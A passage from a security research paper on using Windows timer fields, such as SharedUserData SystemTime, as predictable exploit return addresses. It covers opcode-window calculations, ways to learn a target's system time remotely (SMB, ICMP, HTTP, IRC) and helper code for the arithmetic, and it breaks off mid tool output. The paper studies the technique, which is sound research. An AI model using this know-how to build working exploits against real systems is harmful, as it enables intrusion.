scale that is relative to an arbitrary date (such as 1970 or 1601) are the
|
||||
most useful because they can be predicted or determined with some degree of
|
||||
certainty. Regardless, a generalized approach can be used to determine
|
||||
projected time intervals where useful opcodes will occur.
|
||||
|
||||
To do this, it is first necessary to identify the set of instructions that
|
||||
could be useful for a given exploit, such as a jmp esp. Once identified, the
|
||||
next step is to break the instructions down into their raw opcodes, such as
|
||||
0xff 0xe4 for jmp esp. After all the raw opcodes have been collected, it is
|
||||
then necessary to begin calculating the projected time intervals that the
|
||||
bytes will occur at. The method used to accomplish this is rather simple.
|
||||
|
||||
First, a starting byte index must be determined in terms of the lowest
|
||||
acceptable window of time that an exploit can use. In the case of a 100
|
||||
nanosecond timer, the best byte index to start at would be byte index 4
|
||||
considering all previous indexes have a duration of less than or equal to one
|
||||
second. The bytes that occur at index 4 have a 7 minute and 9 second
|
||||
duration, thus making them feasible for use. With the starting byte index
|
||||
determined, the next step is to create permutations of all subsequent opcode
|
||||
byte combinations. In simpler terms, this would mean producing all of the
|
||||
possible byte value combinations that contain the raw opcodes of a given
|
||||
instruction at a byte index equal to or greater than the starting byte index.
|
||||
To help visualize this, figure 5.1 provides a small sample of jmp esp byte
|
||||
combinations in relation to a 100 nanosecond timer.
|
||||
|
||||
|
||||
Byte combinations
|
||||
-----------------------
|
||||
00 00 00 00 ff e4 00 00
|
||||
00 00 00 00 ff e4 01 00
|
||||
00 00 00 00 ff e4 02 00
|
||||
...
|
||||
00 00 00 00 ff e4 47 04
|
||||
00 00 00 00 ff e4 47 05
|
||||
00 00 00 00 ff e4 47 06
|
||||
...
|
||||
00 00 00 00 00 ff e4 00
|
||||
00 00 00 00 00 ff e4 01
|
||||
00 00 00 00 00 ff e4 02
|
||||
|
||||
Figure 5.1: 8 byte 100ns jmp esp byte combinations
|
||||
|
||||
|
||||
Once all of the permutations have been generated, the next step is to convert
|
||||
them to meaningful absolute time representations. This is accomplished by
|
||||
converting all of the permutations, which represent past, future, or present
|
||||
states of the temporal address, to seconds. For instance, one of the
|
||||
permutations for a jmp esp instruction found within the 64-bit 100 nanosecond
timer is 0x019de4ff00000000 (116500949249294336). Converting this to seconds
is accomplished by doing:


11650094924 = trunc(116500949249294336 / 10^7)
|
||||
|
||||
|
||||
This tells us the number of seconds that will have passed when the stars align
|
||||
to form this byte combination, but it does not convey the scale in which the
|
||||
seconds are measured, such as whether they are based from an absolute date
|
||||
(such as 1970 or 1601) or are simply acting as a timer. In this case, if the
|
||||
scale were defined as being the number of seconds since 1601, the total number
|
||||
of seconds could be adjusted to indicate the number of seconds that have
|
||||
occurred since 1970 by subtracting the constant number of seconds between 1970
|
||||
and 1601:
|
||||
|
||||
|
||||
5621324 = 11650094924 - 11644473600
|
||||
|
||||
|
||||
This indicates that a total of 5621324 seconds will have passed since 1970
|
||||
when 0xff will be found at byte index 4 and 0xe4 will be found at byte index
|
||||
5. The window of opportunity will be 7 minutes and 9 seconds after which
|
||||
point the 0xff will become a 0x00, the 0xe4 will become 0xe5, and the
|
||||
instruction will no longer be usable. If 5621324 is converted to a printable
|
||||
date format based on the number of seconds since 1970, one can find that the
|
||||
date that this particular permutation will occur at is Fri Mar 06 19:28:44 CST
|
||||
1970.
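
The same conversion can be checked with a few lines of Python. The function
name window_open is hypothetical and the result is reported in UTC, so it
reads six hours later than the CST time quoted above.

```python
from datetime import datetime, timezone

TICKS_PER_SECOND = 10**7          # 100 nanosecond update period
EPOCH_1601_OFFSET = 11644473600   # seconds between 1601 and 1970

def window_open(value):
    """Seconds since 1970 and UTC time at which the timer holds `value`."""
    seconds_1601 = value // TICKS_PER_SECOND
    seconds_1970 = seconds_1601 - EPOCH_1601_OFFSET
    return seconds_1970, datetime.fromtimestamp(seconds_1970, tz=timezone.utc)

secs, when = window_open(0x019DE4FF00000000)
print(secs, when.isoformat())
```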
|
||||
|
||||
While it's now been shown that it is perfectly possible to predict specific times
|
||||
in the past, present, and future that a given instruction or instructions can
|
||||
be found within a temporal address, such an ability is not useful without
|
||||
being able to predict or determine the state of the temporal address on a
|
||||
target computer at a specific moment in time. For instance, while an
|
||||
exploitation chronomancer knows that a jmp esp can be found on March 6th, 1970
|
||||
at about 7:30 PM, it must also be known what the target machine's
system time is set to, down to a granularity of mere seconds, or at least minutes.
|
||||
While guessing is always an option, it is almost certainly going to be less
|
||||
fruitful than making use of existing tools and services that are more than
|
||||
willing to provide a would-be attacker with information about the current
|
||||
system time on a target machine. Some of the approaches that can be taken to
|
||||
gather this information will be discussed in the next section.
|
||||
|
||||
|
||||
5.1) Determining System Time
|
||||
|
||||
There are a variety of techniques that can potentially be used to determine
|
||||
the system time of a target machine with varying degrees of accuracy. The
|
||||
techniques listed in this section are by no means all-encompassing but do
|
||||
serve as a good base. Each technique will be elaborated on in the following
|
||||
sub-sections.
|
||||
|
||||
|
||||
5.1.1) DCERPC SrvSvc NetrRemoteTOD
|
||||
|
||||
One approach that can be taken to obtain very granular information about the
|
||||
current system time of a target machine is to use the SrvSvc's NetrRemoteTOD
|
||||
request. To transmit this request to a target machine a NULL session (or
|
||||
authenticated session) must be established using the standard Session Setup
|
||||
AndX SMB request. After that, a Tree Connect AndX to the IPC share should be
|
||||
issued. From there, an NT Create AndX request can be issued on the named
|
||||
pipe. Once the request is handled successfully the file descriptor returned
|
||||
can be used for the DCERPC bind request to the SrvSvc's UUID. Finally, once
|
||||
the bind request has completed successfully, a NetrRemoteTOD request can be
|
||||
transacted over the named pipe using a TransactNmPipe request. The response
|
||||
to this request should contain very granular information, such as day, hour,
|
||||
minute, second, timezone, as well as other fields that are needed to determine
|
||||
the target machine's system time. Figure shows a sample response.
|
||||
|
||||
This vector is very useful because it provides easy access to the complete
|
||||
state of a target machine's system time which in turn can be used to calculate
|
||||
the windows of time that a temporal address can be used during exploitation.
|
||||
The drawback of this approach is that it requires access to the SMB ports
|
||||
(either 139 or 445) which will most likely be inaccessible to an attacker.
|
||||
|
||||
|
||||
5.1.2) ICMP Timestamps
|
||||
|
||||
The ICMP TIMESTAMP request (13) can be used to obtain a machine's measurement
|
||||
of the number of milliseconds that have occurred since midnight UT. If an
|
||||
attacker can infer or assume that a target machine's system time is set to a
|
||||
specific date and timezone, it may be possible to calculate the absolute
|
||||
system time down to a millisecond resolution. This would satisfy the timing
|
||||
requirements and make it possible to make use of temporal addresses that have
|
||||
a scale that is measured from an absolute time. According to the RFC, though,
|
||||
if a system is unable to determine the number of milliseconds since midnight UT then it
|
||||
can use another value capable of representing time (though it must set a
|
||||
high-order bit to indicate the non-standard value).
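
Turning a received timestamp into an absolute time is simple once a date is
assumed. The Python below is a sketch only: the function name icmp_time and
the sample values are hypothetical, and sending the request itself (which
typically needs a raw socket) is left out.

```python
from datetime import date, datetime, timedelta, timezone

def icmp_time(timestamp, assumed_date):
    """Combine an ICMP timestamp with an assumed UTC date.

    Returns None when the high-order bit marks a non-standard value.
    """
    if timestamp & 0x80000000:
        return None
    midnight = datetime(assumed_date.year, assumed_date.month,
                        assumed_date.day, tzinfo=timezone.utc)
    return midnight + timedelta(milliseconds=timestamp)

# 19269000 ms after midnight UT on an assumed date of 6 August 2005.
print(icmp_time(19269000, date(2005, 8, 6)))
print(icmp_time(0x80000001, date(2005, 8, 6)))
```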
|
||||
|
||||
|
||||
5.1.3) IP Timestamp Option
|
||||
|
||||
Like the ICMP TIMESTAMP request, IP also has a timestamp option (type 68) that
|
||||
measures the number of milliseconds since midnight UT. This could also be used
|
||||
to determine down to a millisecond resolution what the remote system's clock
|
||||
is set to. Since the measurement is the same, the limitations are the same as
|
||||
ICMP's TIMESTAMP request.
|
||||
|
||||
|
||||
5.1.4) HTTP Server Date Header
|
||||
|
||||
In scenarios where a target machine is running an HTTP server, it may be
|
||||
possible to extract the system time by simply sending an HTTP request and
|
||||
checking to see if the response contains a date header or not. Figure shows
|
||||
an example HTTP response that contains a date header.
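
Extracting the header is straightforward. The Python sketch below parses a
made-up response held in memory, so the response text, the function name
server_time and the date in it are all hypothetical. The standard library's
email.utils.parsedate_to_datetime is used to interpret the date string.

```python
from email.utils import parsedate_to_datetime

# Hypothetical response, not captured from a real server.
SAMPLE = (b"HTTP/1.1 200 OK\r\n"
          b"Date: Sat, 06 Aug 2005 05:21:09 GMT\r\n"
          b"Content-Length: 0\r\n\r\n")

def server_time(response):
    """Return the Date header of a raw HTTP response as a datetime."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "date":
            return parsedate_to_datetime(value.strip())
    return None

print(server_time(SAMPLE))
```

The header only has a resolution of one second, and it reflects the server's
clock at the time the response was generated.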
|
||||
|
||||
|
||||
5.1.5) IRC CTCP TIME
|
||||
|
||||
Perhaps one of the more lame approaches to obtaining a target machine's time
|
||||
is by issuing a CTCP TIME request over IRC. This request is designed to
|
||||
instruct the responder to reply with a readable date string that is relative
|
||||
to the responder's system time. Unless spoofed, the response should be
|
||||
equivalent to the system time on the remote machine.
|
||||
|
||||
|
||||
6) Determining the Return Address
|
||||
|
||||
Once all the preliminary work of calculating all of the viable opcode windows
|
||||
has been completed and a target machine's system time has been determined, the
|
||||
final step is to select the next available window for a compatible opcode
|
||||
group. For instance, if the next window for a jmp esp equivalent instruction
|
||||
is Sun Sep 25 23:37:28 CDT 2005, then the byte index to the start of the jmp
|
||||
esp equivalent must be determined based on the permutation that was generated.
|
||||
In this case, the permutation that would have been generated (assuming a
|
||||
100 nanosecond period since 1601) is 0x01c5c25400000000. This means that the jmp
esp equivalent is actually a push esp, ret (0x54 0xc2) which starts at byte index four.
|
||||
If the start of the temporal address was at 0x7ffe0014, then the return
|
||||
address that should be used in order to get the push esp, ret to execute would
|
||||
be 0x7ffe0018. This basic approach is common to all temporal addresses of
|
||||
varying capacity, period, and scale.
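
The address arithmetic can be expressed in a few lines of Python. The function
name return_address is hypothetical. The opcode bytes searched for, 0x54 0xc2,
are the push esp and ret bytes that appear at byte indexes four and five of
the permutation above when it is laid out in little-endian order.

```python
def return_address(base, value, opcode, size=8):
    """Address of `opcode` inside a little-endian timer stored at `base`."""
    raw = value.to_bytes(size, "little")
    index = raw.find(opcode)
    if index < 0:
        raise ValueError("opcode not present in this timer state")
    return base + index

addr = return_address(0x7FFE0014, 0x01C5C25400000000, bytes([0x54, 0xC2]))
print(hex(addr))
```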
|
||||
|
||||
|
||||
7) Case Study: Windows NT SharedUserData
|
||||
|
||||
With all the generic background information out of the way, a real world
|
||||
practical use of this technique can be illustrated through an analysis of a
|
||||
region of memory that happens to be found in every process on Windows NT+.
|
||||
This region of memory is referred to as SharedUserData and has a backward
|
||||
compatible format for all versions of NT, though new fields have been appended
|
||||
over time. At present, the data structure that represents SharedUserData is
|
||||
KUSER_SHARED_DATA which is defined as follows on Windows XP SP2:
|
||||
|
||||
|
||||
0:000> dt _KUSER_SHARED_DATA
|
||||
+0x000 TickCountLow : Uint4B
|
||||
+0x004 TickCountMultiplier : Uint4B
|
||||
+0x008 InterruptTime : _KSYSTEM_TIME
|
||||
+0x014 SystemTime : _KSYSTEM_TIME
|
||||
+0x020 TimeZoneBias : _KSYSTEM_TIME
|
||||
+0x02c ImageNumberLow : Uint2B
|
||||
+0x02e ImageNumberHigh : Uint2B
|
||||
+0x030 NtSystemRoot : [260] Uint2B
|
||||
+0x238 MaxStackTraceDepth : Uint4B
|
||||
+0x23c CryptoExponent : Uint4B
|
||||
+0x240 TimeZoneId : Uint4B
|
||||
+0x244 Reserved2 : [8] Uint4B
|
||||
+0x264 NtProductType : _NT_PRODUCT_TYPE
|
||||
+0x268 ProductTypeIsValid : UChar
|
||||
+0x26c NtMajorVersion : Uint4B
|
||||
+0x270 NtMinorVersion : Uint4B
|
||||
+0x274 ProcessorFeatures : [64] UChar
|
||||
+0x2b4 Reserved1 : Uint4B
|
||||
+0x2b8 Reserved3 : Uint4B
|
||||
+0x2bc TimeSlip : Uint4B
|
||||
+0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
|
||||
+0x2c8 SystemExpirationDate : _LARGE_INTEGER
|
||||
+0x2d0 SuiteMask : Uint4B
|
||||
+0x2d4 KdDebuggerEnabled : UChar
|
||||
+0x2d5 NXSupportPolicy : UChar
|
||||
+0x2d8 ActiveConsoleId : Uint4B
|
||||
+0x2dc DismountCount : Uint4B
|
||||
+0x2e0 ComPlusPackage : Uint4B
|
||||
+0x2e4 LastSystemRITEventTickCount : Uint4B
|
||||
+0x2e8 NumberOfPhysicalPages : Uint4B
|
||||
+0x2ec SafeBootMode : UChar
|
||||
+0x2f0 TraceLogging : Uint4B
|
||||
+0x2f8 TestRetInstruction : Uint8B
|
||||
+0x300 SystemCall : Uint4B
|
||||
+0x304 SystemCallReturn : Uint4B
|
||||
+0x308 SystemCallPad : [3] Uint8B
|
||||
+0x320 TickCount : _KSYSTEM_TIME
|
||||
+0x320 TickCountQuad : Uint8B
|
||||
+0x330 Cookie : Uint4B
|
||||
|
||||
|
||||
One of the purposes of SharedUserData is to provide processes with a global
|
||||
and consistent method of obtaining certain information that may be requested
|
||||
frequently, thus making it more efficient than having to incur the performance
|
||||
hit of a system call. Furthermore, as of Windows XP, SharedUserData acts as
|
||||
an indirect system call re-director such that the most optimized system call
|
||||
instructions can be used based on the current hardware's support, such as by
|
||||
using sysenter over the standard int 0x2e.
|
||||
|
||||
As can be seen right off the bat, SharedUserData contains a few fields that
|
||||
pertain to the timing of the current system. Furthermore, if one looks
|
||||
closely, it can be seen that these timer fields are actually updated
|
||||
constantly as would be expected for any timer variable:
|
||||
|
||||
|
||||
0:000> dd 0x7ffe0000 L8
|
||||
7ffe0000 055d7525 0fa00000 93fd5902 00000cca
|
||||
7ffe0010 00000cca a78f0b48 01c59a46 01c59a46
|
||||
0:000> dd 0x7ffe0000 L8
|
||||
7ffe0000 055d7558 0fa00000 9477d5d2 00000cca
|
||||
7ffe0010 00000cca a808a336 01c59a46 01c59a46
|
||||
0:000> dd 0x7ffe0000 L8
|
||||
7ffe0000 055d7587 0fa00000 94e80a7e 00000cca
|
||||
7ffe0010 00000cca a878b1bc 01c59a46 01c59a46
|
||||
|
||||
|
||||
The three timing-related fields of most interest are TickCountLow,
|
||||
InterruptTime, and SystemTime. These three fields will be explained
|
||||
individually later in this chapter. Prior to that, though, it is important to
|
||||
understand some of the properties of SharedUserData and why it is that it's
|
||||
quite useful when it comes to temporal addresses.
|
||||
|
||||
|
||||
7.1) The Properties of SharedUserData
|
||||
|
||||
There are a number of important properties of SharedUserData, some of
|
||||
which make it useful in terms of temporal addresses and others that make it
|
||||
somewhat infeasible depending on the exploit or hardware support. As far as
|
||||
the properties that make it useful go, SharedUserData is located at a static
|
||||
address, 0x7ffe0000, in every version of Windows NT+. Furthermore,
|
||||
SharedUserData is mapped into every process. The reasons for this are that
|
||||
NTDLL, and most likely other 3rd party applications, have been compiled and
|
||||
built with the assumption that SharedUserData is located at a fixed address.
|
||||
This is something many people are abusing these days when it comes to passing
|
||||
code from kernel-mode to user-mode. On top of that, SharedUserData is required
|
||||
to have a backward compatible data structure which means that the offsets of
|
||||
all existing attributes will never shift, although new attributes may be, and
|
||||
have been, appended to the end of the data structure. Lastly, there are a few
|
||||
products for Windows that implement some form of ASLR. Unfortunately for these
|
||||
products, SharedUserData cannot be feasibly randomized, or at least the author
|
||||
is not aware of any approaches that wouldn't have severe performance impacts.
|
||||
|
||||
On the negative side of the house, and perhaps one of the most limiting
|
||||
factors when it comes to making use of SharedUserData, is that it has a null
|
||||
byte located at byte index one. Depending on the vulnerability, it may or may
|
||||
not be possible to use an attribute within SharedUserData as a return address
|
||||
due to NULL byte restrictions. As of XP SP2 and 2003 Server SP1,
|
||||
SharedUserData is no longer marked as executable and will result in a DEP
|
||||
violation (if enabled) assuming the hardware supports PAE. While this is not
|
||||
very common yet, it is sure to become the norm over the course of time.
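To make the NULL byte restriction concrete, the following C sketch reports which byte of a 32-bit address is zero when the address is laid out in little-endian order, as it would be inside an overflow buffer on x86. The function name is hypothetical and is introduced here only for illustration; the little-endian layout is an assumption that holds for the x86 systems this paper discusses.

```c
#include <stdint.h>

/*
 * Hypothetical helper (not from the paper): returns the index (0..3) of
 * the first 0x00 byte of addr in little-endian order, or -1 if the
 * address contains no NULL byte at all.
 */
int first_null_byte_index(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        if (((addr >> (8 * i)) & 0xffu) == 0) {
            return i;
        }
    }
    return -1;
}
```

Applied to the SystemTime address 0x7ffe0014, the helper returns 1, which is the byte index the text refers to. An ntdll address such as 0x7c952080 contains no NULL byte and yields -1.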
|
||||
|
||||
|
||||
7.2) Locating Temporal Addresses
|
||||
|
||||
As seen previously in this document, using the telescope program on any
|
||||
Windows application will result in the same two (or three) timers being
|
||||
displayed:
|
||||
|
||||
|
||||
C:\>telescope 2620
|
||||
[*] Attaching to process 2620 (5 polling cycles)...
|
||||
[*] Polling address space........
|
||||
|
||||
Temporal address locations:
|
||||
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
|
||||
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
|
||||
|
||||
|
||||
Referring to the structure definition described at the beginning of this
|
||||
chapter, it is possible for one to determine which attribute each of these
|
||||
addresses is referring to. Each of these three attributes will be discussed
|
||||
in detail in the following sub-sections.
|
||||
|
||||
|
||||
7.2.1) TickCountLow
|
||||
|
||||
The TickCountLow attribute is used, in combination with the
|
||||
TickCountMultiplier, to convey the number of milliseconds that have elapsed
|
||||
since system boot. To calculate the number of milliseconds since system boot,
|
||||
the following equation is used:
|
||||
|
||||
|
||||
T = shr(TickCountLow * TickCountMultiplier, 24)
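The equation above can be sketched in C as follows. The function name is hypothetical, and the 64-bit intermediate product is an assumption made here so that the multiplication cannot overflow before the shift; the paper itself only gives the formula.

```c
#include <stdint.h>

/*
 * Sketch of T = shr(TickCountLow * TickCountMultiplier, 24).
 * The multiplier is treated as a fixed-point value with 24 fractional
 * bits, so the product is computed in 64 bits and then shifted right.
 */
uint64_t tick_count_to_ms(uint32_t tick_count_low,
                          uint32_t tick_count_multiplier)
{
    return ((uint64_t)tick_count_low * tick_count_multiplier) >> 24;
}
```

With the multiplier 0x0fa00000 seen in the memory dumps earlier in this chapter, each tick is worth 0x0fa00000 / 2^24 = 15.625 milliseconds, so the first dumped TickCountLow value, 0x055d7525, corresponds to roughly 16 days of uptime.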
|
||||
|
||||
|
||||
This attribute is representative of a temporal address that has a counter
|
||||
scale. It starts at an unknown time and increments at constant intervals. The
|
||||
biggest problem with this attribute is the interval at which it increases.
|
||||
It's possible that two machines in the same room with different hardware will
|
||||
have different update periods for the TickCountLow attribute. This makes it
|
||||
less feasible to use as a temporal address because the update period cannot be
|
||||
readily predicted. On the other hand, it may be possible to determine the
|
||||
current uptime of the machine through TCP timestamps or some alternative
|
||||
mechanism, but without the ability to determine the update period, the
|
||||
TickCountLow attribute seems unusable.
|
||||
|
||||
This attribute is located at 0x7ffe0000 on all versions of Windows NT+.
|
||||
|
||||
|
||||
7.2.2) InterruptTime
|
||||
|
||||
This attribute is used to store a 100 nanosecond timer starting at system boot
|
||||
that presumably counts the amount of time spent processing interrupts. The
|
||||
attribute itself is stored as a KSYSTEM_TIME structure which is defined as:
|
||||
|
||||
|
||||
0:000> dt _KSYSTEM_TIME
|
||||
+0x000 LowPart : Uint4B
|
||||
+0x004 High1Time : Int4B
|
||||
+0x008 High2Time : Int4B
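As a rough illustration of this layout, the sketch below mirrors the three fields in portable C, checks that a structure prefix built from them reproduces the offsets listed for SharedUserData at the start of this chapter, and combines the fields into one 64-bit value. The type and function names are hypothetical. The idea that a reader should reject a sample whose two high parts differ is an assumption based on the common understanding of why the high part is stored twice; it is not something this paper states.

```c
#include <stddef.h>
#include <stdint.h>

/* Portable mirror of the dt output above (names are illustrative). */
typedef struct {
    uint32_t LowPart;
    int32_t  High1Time;
    int32_t  High2Time;
} ksystem_time_t;

/* First fields of SharedUserData, as listed earlier in this chapter. */
typedef struct {
    uint32_t       TickCountLow;
    uint32_t       TickCountMultiplier;
    ksystem_time_t InterruptTime;
    ksystem_time_t SystemTime;
    ksystem_time_t TimeZoneBias;
} shared_user_data_prefix_t;

_Static_assert(offsetof(shared_user_data_prefix_t, InterruptTime) == 0x08,
               "InterruptTime offset");
_Static_assert(offsetof(shared_user_data_prefix_t, SystemTime) == 0x14,
               "SystemTime offset");
_Static_assert(offsetof(shared_user_data_prefix_t, TimeZoneBias) == 0x20,
               "TimeZoneBias offset");

/*
 * Reads one sample. Returns 1 and stores the 64-bit value in *out when
 * both high parts agree, or 0 when they differ (assumed to mean the
 * sample was taken in the middle of an update).
 */
int ksystem_time_read(const volatile ksystem_time_t *src, uint64_t *out)
{
    int32_t  high1 = src->High1Time;
    uint32_t low   = src->LowPart;
    int32_t  high2 = src->High2Time;

    if (high1 != high2) {
        return 0;
    }
    *out = ((uint64_t)(uint32_t)high1 << 32) | low;
    return 1;
}
```

Feeding it the SystemTime words from the first dump (a78f0b48, 01c59a46, 01c59a46) yields 0x01c59a46a78f0b48.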
|
||||
|
||||
|
||||
Depending on the hardware a machine is running, the InterruptTime's period may
|
||||
be exactly equal to 100 nanoseconds. However, testing has seemed to confirm
|
||||
that this is not always the case. Given this, both the update period and the
|
||||
scale of the InterruptTime attribute should be seen as limiting factors. This
|
||||
fact makes it less useful because it has the same limitations as the
|
||||
TickCountLow attribute. Specifically, without knowing when the system booted
|
||||
and when the counter started, or how much time has been spent processing
|
||||
interrupts, it is not possible to reliably predict when certain bytes will be
|
||||
at certain offsets. Furthermore, the machine would need to have been booted
|
||||
for a significant amount of time in order for some of the useful instructions
|
||||
to be feasibly found within the bytes that compose the timer.
|
||||
|
||||
This attribute is located at 0x7ffe0008 on all versions of Windows NT+.
|
||||
|
||||
|
||||
7.2.3) SystemTime
|
||||
|
||||
The SystemTime attribute is by far the most useful attribute when it comes to
|
||||
its temporal address qualities. The attribute itself is a 100 nanosecond
|
||||
timer that is measured from Jan. 1, 1601, which is stored as a KSYSTEM_TIME
|
||||
structure like the InterruptTime attribute. See the InterruptTime sub-section
|
||||
for a structure definition. This means that it has an update period of 100
|
||||
nanoseconds and has a scale that measures from Jan. 1, 1601. The scale is also
|
||||
measured relative to the timezone that the machine is using (with the
|
||||
exclusion of daylight saving time). If an attacker is able to obtain
|
||||
information about the system time on a target machine, it may be possible to
|
||||
make use of the SystemTime attribute as a valid temporal address for
|
||||
exploitation purposes.
|
||||
|
||||
This attribute is located at 0x7ffe0014 on all versions of Windows NT+.
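Because the 1601 scale is awkward to reason about, it can help to convert between it and the more familiar 1970 scale. The sketch below does this with the well-known offset of 11644473600 seconds between the two epochs. The function names are hypothetical, and the sketch deliberately ignores the time zone question raised above; it only converts between the two scales.

```c
#include <stdint.h>

#define TICKS_PER_SECOND    10000000ULL    /* 100 nanosecond units */
#define EPOCH_DELTA_SECONDS 11644473600ULL /* Jan 1 1601 to Jan 1 1970 */

/* 100 ns units since 1601 -> whole seconds since 1970. */
int64_t system_time_to_unix_seconds(uint64_t system_time)
{
    return (int64_t)(system_time / TICKS_PER_SECOND)
         - (int64_t)EPOCH_DELTA_SECONDS;
}

/* Whole seconds since 1970 -> 100 ns units since 1601.
 * Only meaningful for times on or after Jan 1, 1601. */
uint64_t unix_seconds_to_system_time(int64_t unix_seconds)
{
    return (uint64_t)(unix_seconds + (int64_t)EPOCH_DELTA_SECONDS)
         * TICKS_PER_SECOND;
}
```

An attacker-side calculation would typically start from a wall-clock estimate of the target's time, convert it to the 1601 scale, and then inspect the resulting bytes.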
|
||||
|
||||
|
||||
7.3) Calculating Viable Opcode Windows
|
||||
|
||||
After analyzing SharedUserData for temporal addresses it should become clear
|
||||
that the SystemTime attribute is by far the most useful and potentially
|
||||
feasible attribute due to its scale and update period. In order to
|
||||
successfully leverage it in conjunction with an exploit, though, the viable
|
||||
opcode windows must be calculated so that a time to strike can be selected.
|
||||
This can be done prior to determining what the actual date is on a target
|
||||
machine but requires that the storage capacity (size of the temporal address
|
||||
in bytes), the update period, and the scale be known. In this case, the size
|
||||
of the SystemTime attribute is 12 bytes, though in reality the 3rd attribute,
|
||||
High2Time, is exactly the same as the second, High1Time, so all that really
|
||||
matters are the first 8 bytes. Doing the math to calculate per-byte
|
||||
durations gives the results shown in figure . This indicates that it is only
|
||||
worth focusing on opcode permutations that start at byte index four due to the
|
||||
fact that all previous byte indexes have a duration of less than or equal to
|
||||
one second. By applying the scale as being measured since Jan 1, 1601, all of
|
||||
the possible permutations for the past, present, and future can be calculated
|
||||
as described in chapter . The results of these calculations for the
|
||||
SystemTime attribute are described in the following paragraphs.
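The per-byte durations follow directly from the update period: the byte at index n keeps the same value for the period multiplied by 256^n. A minimal C sketch of that arithmetic is shown below; the function name is hypothetical, and expressing the period in nanoseconds is a choice made here for convenience.

```c
#include <stdint.h>

/*
 * Time, in nanoseconds, for which the byte at the given index of a
 * little-endian timer holds one value: period * 256^index.
 * The caller must keep the result within 64 bits (for example, a 100 ns
 * period with index 0..7, or a 1 second period with index 0..3).
 */
uint64_t byte_duration_ns(uint64_t period_ns, unsigned index)
{
    return period_ns << (8 * index);
}
```

For a 100 nanosecond period, byte index three lasts about 1.68 seconds and byte index four lasts 429.4967296 seconds, or roughly 7 minutes 9 seconds. That matches the spacing between consecutive entries on Sep 25 in the opcode window table later in this chapter (22:08:50, 22:15:59, and so on).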
|
||||
|
||||
In order to calculate the viable opcode windows it is necessary to have
|
||||
identified the viable set of opcodes. In this case study a total of 320
|
||||
viable opcodes were used (recall that opcode in this case can mean one or more
|
||||
instructions). These viable opcodes were taken from the Metasploit Opcode
|
||||
Database. After performing the necessary calculations and generating all of
|
||||
the permutations, a total of 3615 viable opcode windows were found between
|
||||
Jan. 1, 1970 and Dec. 23, 2037. Each viable opcode was broken down into
|
||||
groupings of similar or equivalent opcodes such that it could be made easier
|
||||
to visualize.
|
||||
|
||||
Looking closely at these figures it can be seen that there were two large
|
||||
spikes around 2002 and 2003 for the [esp + 8] => eip opcode group which
|
||||
includes pop/pop/ret instructions common to SEH overwrites. Looking more
|
||||
closely at these two years shows that there were two significant periods of
|
||||
time during 2002 and 2003 where the stars aligned and certain exploits could
|
||||
have used the SystemTime attribute as a temporal return address. Figure shows
|
||||
the spikes in more detail. It's a shame that this technique was not published
|
||||
during those time frames! Never again in the lifetime of anyone who
|
||||
reads this paper will there be such an occurrence.
|
||||
|
||||
Perhaps of more interest than past occurrences of certain opcode groups is
|
||||
what will come in the future. The table in figure 7.1 shows the upcoming
|
||||
viable opcode windows for 2005.
|
||||
|
||||
|
||||
Date Opcode Group
|
||||
------------------------------------------
|
||||
Sun Sep 25 22:08:50 CDT 2005 eax => eip
|
||||
Sun Sep 25 22:15:59 CDT 2005 ecx => eip
|
||||
Sun Sep 25 22:23:09 CDT 2005 edx => eip
|
||||
Sun Sep 25 22:30:18 CDT 2005 ebx => eip
|
||||
Sun Sep 25 22:37:28 CDT 2005 esp => eip
|
||||
Sun Sep 25 22:44:37 CDT 2005 ebp => eip
|
||||
Sun Sep 25 22:51:47 CDT 2005 esi => eip
|
||||
Sun Sep 25 22:58:56 CDT 2005 edi => eip
|
||||
Tue Sep 27 04:41:21 CDT 2005 eax => eip
|
||||
Tue Sep 27 04:48:30 CDT 2005 ecx => eip
|
||||
Tue Sep 27 04:55:40 CDT 2005 edx => eip
|
||||
Tue Sep 27 05:02:49 CDT 2005 ebx => eip
|
||||
Tue Sep 27 05:09:59 CDT 2005 esp => eip
|
||||
Tue Sep 27 05:17:08 CDT 2005 ebp => eip
|
||||
Tue Sep 27 05:24:18 CDT 2005 esi => eip
|
||||
Tue Sep 27 05:31:27 CDT 2005 edi => eip
|
||||
Tue Sep 27 06:43:02 CDT 2005 [esp + 0x20] => eip
|
||||
Fri Oct 14 14:36:48 CDT 2005 eax => eip
|
||||
Sat Oct 15 21:09:19 CDT 2005 ecx => eip
|
||||
Mon Oct 17 03:41:50 CDT 2005 edx => eip
|
||||
Tue Oct 18 10:14:22 CDT 2005 ebx => eip
|
||||
Wed Oct 19 16:46:53 CDT 2005 esp => eip
|
||||
Thu Oct 20 23:19:24 CDT 2005 ebp => eip
|
||||
Sat Oct 22 05:51:55 CDT 2005 esi => eip
|
||||
Sun Oct 23 12:24:26 CDT 2005 edi => eip
|
||||
Thu Nov 03 23:17:07 CST 2005 eax => eip
|
||||
Sat Nov 05 05:49:38 CST 2005 ecx => eip
|
||||
Sun Nov 06 12:22:09 CST 2005 edx => eip
|
||||
Mon Nov 07 18:54:40 CST 2005 ebx => eip
|
||||
Wed Nov 09 01:27:11 CST 2005 esp => eip
|
||||
Thu Nov 10 07:59:42 CST 2005 ebp => eip
|
||||
Fri Nov 11 14:32:14 CST 2005 esi => eip
|
||||
Sat Nov 12 21:04:45 CST 2005 edi => eip
|
||||
|
||||
Figure 7.1: Opcode windows for Sept 2005 - Jan 2006
|
||||
|
||||
|
||||
8) Case study: Example application
|
||||
|
||||
Aside from Windows processes having SharedUserData present, it may also be
|
||||
possible, depending on the application in question, to find other temporal
|
||||
addresses at static locations across various operating system versions. Take
|
||||
for instance the following example program that simply calls time every second
|
||||
and stores it in a local variable on the stack named t:
|
||||
|
||||
|
||||
#include <windows.h>
#include <time.h>

int main(void) {
    /* t lives on the stack and is refreshed once per second */
    unsigned long t;

    while (1) {
        t = (unsigned long)time(NULL);
        SleepEx(1000, TRUE);
    }
}
|
||||
|
||||
|
||||
When the telescope program is run against a running instance of this example
|
||||
program, the results produced are:
|
||||
|
||||
|
||||
C:\>telescope 3004
|
||||
[*] Attaching to process 3004 (5 polling cycles)...
|
||||
[*] Polling address space........
|
||||
|
||||
Temporal address locations:
|
||||
